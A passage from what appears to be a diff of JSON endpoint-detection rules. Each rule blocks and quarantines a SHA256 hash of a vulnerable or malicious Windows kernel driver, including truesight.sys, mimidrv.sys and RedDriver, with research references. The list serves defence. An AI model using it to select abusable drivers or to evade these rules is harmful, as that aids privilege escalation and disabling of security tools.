+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477321Z",
+ "creation_date": "2026-03-23T11:45:31.477325Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477336Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e9a210fd7d55526d329aed28aa20a32a706e9a4ae631ae314983b7dadc223265",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "95bfb187-0c64-55d0-a36f-8a40afe1e44f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150530Z",
+ "creation_date": "2026-03-23T11:45:31.150532Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150537Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44f369c19a088e940ebcecaf4e76ceb5de2df6de99d6ec6eb42d76653e294a3c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "95c44536-5b79-5f23-a681-a8992341b5ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606332Z",
+ "creation_date": "2026-03-23T11:45:29.606334Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "decba65bbf2232ac55a698539304cab211b45eef0ed17c05dd7995bef2b98fc6",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "95ce19ea-6093-5c3a-b8b8-6e38e5776ca0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478633Z",
+ "creation_date": "2026-03-23T11:45:31.478637Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478646Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e867e441d3cd8f642628c2f5fe444c3530fecf8110e854705c7e69fb17361eb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "95de7c68-6302-5c3c-b3e3-c2dfae63c647",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822406Z",
+ "creation_date": "2026-03-23T11:45:30.822408Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822414Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58d81ddb4104c37284b15fca0d90b4388e430a34d93823df1a3514962dbcddb5",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "95e381d1-773b-59bf-91d2-664882043a0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499616Z",
+ "creation_date": "2026-03-23T11:45:31.499619Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499627Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c83a6c5a958d37120860687502a434c1cca089e832e0c6722d10341518d9c2c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "95f15f28-d7eb-5afb-bf5f-8b2996e32d36",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820737Z",
+ "creation_date": "2026-03-23T11:45:30.820739Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820744Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f14da8aa5c8eea8df63cf935481d673fdf3847f5701c310abf4023f9d80ad57d",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "95fd2d2e-65c6-549a-a8a7-a0a064de87b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810073Z",
+ "creation_date": "2026-03-23T11:45:31.810076Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810084Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd5657f459dfb4f93069a1a9ae1968836a4ef63d88236b65b9bf8a120f0c0495",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96003a1f-dbcf-51b5-b601-ab7abdbbbbaa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468286Z",
+ "creation_date": "2026-03-23T11:45:30.468290Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468299Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c44c0464e5b01540ba573be7555b3fcbdb65c9f1193f9c1d02b04c70090d4ac",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96073a34-cef1-5b14-a28f-f6a4af90d790",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490678Z",
+ "creation_date": "2026-03-23T11:45:31.490680Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490686Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "841d4abdf793d1e16adc215eed8b34ce477a146d1e05620abc6ddfdb0f008ba9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "961faf78-0b83-5c21-b2b2-0e4b70c773c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986066Z",
+ "creation_date": "2026-03-23T11:45:29.986068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986073Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7aa067d928404795b4eb9c169639f23997227504ca4eb7b5b21518e6155abd47",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "962039f0-3b08-52d8-89b1-9dc27e23ee4a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452650Z",
+ "creation_date": "2026-03-23T11:45:30.452653Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452661Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5d10285d802fa793c217933c907d82db58977b865b3dad3848c6ed2550022413",
+ "comment": "Vulnerable Kernel Driver (aka phydmaccx86.sys) [https://www.loldrivers.io/drivers/1055625b-3480-48b3-9556-8628a745d8f0/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9629d955-c807-5b7f-b621-1ba06aa31d5c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836771Z",
+ "creation_date": "2026-03-23T11:45:30.836774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836779Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d98c45421981f03a80c8237c0e04d897d637f5375c9ea31b2d6720dcd1fccc5c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "962b83f0-8be0-5635-af18-0a63b0f55723",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825575Z",
+ "creation_date": "2026-03-23T11:45:31.825577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825582Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d994c963dd4845936895346870b7d84fec03cc9d1bb495ef7a3049d386b9a1d7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9635663a-e305-5cbc-be6d-6f9493af3e5b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980379Z",
+ "creation_date": "2026-03-23T11:45:29.980381Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980386Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7b743c3f98662c955c616e0d1bb0800c9602e5b6f2385336a72623037bfd6dd",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "963bc974-a45c-548b-a466-228de2992b4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493452Z",
+ "creation_date": "2026-03-23T11:45:31.493454Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493459Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e74a5c67a449d84b5ab5c3556e96698f914526e7002bc52be1e59c875e2cea40",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9640599e-f57c-5160-a65c-705e2d1fc238",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155666Z",
+ "creation_date": "2026-03-23T11:45:31.155668Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155674Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0c557d14174aa4690efa1a2cac47c1ff8d31c4ddf83f437b36360cb51b2bb17",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "964c0ff5-2f26-5c7a-a318-dfbb2c216d2d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470192Z",
+ "creation_date": "2026-03-23T11:45:30.470195Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470205Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "951edade4ad00b185929c14622e5efcac1069cadaf6bcc945e744c30f069c9b9",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9655220e-adae-5fd0-b3f8-eef1b28611bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469806Z",
+ "creation_date": "2026-03-23T11:45:30.469810Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469819Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbf98b321670fd17462e7ceb8a0d002b9a1474f8015d94ea267a942a2e20c80b",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "965e16ce-e6e8-5fa7-95f1-07a49921cf71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816555Z",
+ "creation_date": "2026-03-23T11:45:30.816557Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816563Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb3b45506d203aafb4ef28586c0655cd2e9095e6238a8ccf76ab6eb6113b4476",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9669b12d-935d-52a4-8d5d-fcebc01b711e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809158Z",
+ "creation_date": "2026-03-23T11:45:31.809161Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809169Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b0c0ebf75a563c07b8406d3946a927e3deb0d60a52600497e4a4eb9dbafe881",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "966baff3-3498-588c-9dbc-26038cc09bf0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828884Z",
+ "creation_date": "2026-03-23T11:45:31.828886Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ca8956df2fde0e7ab8fe9f0cc4e03a69b0ff18b39b1618e64ba989a4a14a14e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9676115c-425c-50d9-8d7b-f2a6834d1d86",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477225Z",
+ "creation_date": "2026-03-23T11:45:31.477228Z",
+ "enabled": true,
+ "block_on_agent": true,
